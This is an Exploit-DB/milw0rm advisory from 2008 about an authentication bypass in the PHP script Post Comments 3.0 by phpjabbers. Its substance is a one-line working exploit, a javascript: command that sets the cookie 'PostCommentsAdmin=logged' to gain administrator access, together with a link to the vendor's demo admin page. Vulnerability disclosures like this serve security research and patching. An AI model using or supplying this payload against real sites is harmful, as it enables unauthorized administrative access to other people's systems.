Post Comments 3.0 - Insecure Cookie Handling

EDB-ID:

6625




Platform:

PHP

Date:

2008-09-29


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Post Comments v3.0 Insecure Cookie Handling Vulnerability
****************************
By Crackers_Child
****************************
Demo : http://www.phpjabbers.com/post-comment/try/admin.php

Vendor :   by phpjabbers.com

Exploit : javascript:document.cookie = "PostCommentsAdmin=logged; path=/";
****************************
Tum Musluman Aleminin Ramazan Bayrami Kutlu Olsun.
****************************

# milw0rm.com [2008-09-29]